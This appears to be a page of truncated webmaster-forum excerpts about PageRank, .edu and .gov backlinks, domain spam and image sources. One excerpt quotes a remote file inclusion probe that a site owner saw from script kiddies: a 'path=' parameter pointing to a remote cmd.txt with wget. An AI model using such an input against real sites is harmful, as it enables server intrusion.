Hi, I'm just wondering: does somewhere exist a kind of top ranking list? Like the top 1000 PR9, PR8 etc? Haven't seen anything like that, but it might be useful? I just realise one could use the Google Directory. But not all sites are in it. Reg, Birthe try typing http: into google's search box... that would bring up the top sites you are looking for wouldn't it? Where you are right, you are right ;-) Yall might find this useful. I have updated some of the backlinks. Found this a couple of weeks ago and ...

I've read many times that .edu and .gov backlinks are useful for SEO, but why? Must those backlinks be Do-Follow to contribute to SEO? Anybody knows? Hey, whither its a .edu or .gov or .com wont really matter if it links to you. They may get a bit more repect from search engions because they are ment for schools and goverments. if the back link is no follow then the search engine dont follow the link, so be careful about buying back links(which you really shouldnt do anyway) as they have a high chance of ...

Just curious. I have some backlinks that should be coming in from India (guest posting on a technology blog). I heard varying things regarding the topic. Thanks. Why on earth would they be? Hmmm, that article starts by spouting the myth that Google favours .edu and .gov sites. Next, it claims that links from the same IP have no value... So I don't really trust its authority But still, it doesn't say that links from other countries are MORE powerful. It only states that you shouldn't limit yourself when ...

I designed my website to use the index.php?path=blah style of getting around. Once in a while I get script kiddies who try to pull a index.php?path=http://blah//cmd.txt%whereis%wget kind of deal on my website. Where is a good and amusing place to forward people like this? I was thinking some place like http://www.fbi.gov, or some fraud investigation site, or maybe one of those sites that use ActiveX to show the contents of your c:\ Any interesting and fun ideas? I made a 404 error page that emails me when ...

Hello all, I ran into an issue the other day that I have never had to worry about. A client of mine (I provide computer services for them) owns a domain and has a website hosted through Earthlink. They didn't know much about website design or anything else so they hired someone to create the site for them. The website is http://greenspanmarketing.com. The issue is not the site itself. About two or more months ago someone in Poland (Found that out through an IP trace) and other places are sending spam using ...

One link also appeared to be from Australian government website and one link even had words like alert and fraud in it. Its just a normal blog where i put articles related to webmasters and some of my fiction concepts. I never did anything illegal on it, site always had a working contact form and visible whois data, but ...

Hello I saw a posting a few lines down about images and noticed it said the post was from 2006. I received this list from a friend of mine a few days ago. It is a list of websites of images and royalty free images for commercial use. So I compared both lists and seems most of these sites my friend gave me weren't on that 2006 list. So anyways I figured if it helps someone out cool- I don't want to be held accountable if some of it is bad lol. I am just trying to help out with this list I received. ...

About four weeks ago Google may have begun favoring .edu sites. The two examples below illustrate the problem. *Plagiarism In June, 2005 The University at Dallas Texas (utdallas.edu) plagiarized content regarding pornography addiction from SexualControl.com created in 1999. Go to Sexualcontrol.com/google-prefers-edu-01.html for a Google search on pornography addiction as recent as June 3, 2007. The utdallas.edu plagiary is fourth. Until four weeks ago, SexualControl.com/pornography-addiction.html was in ...
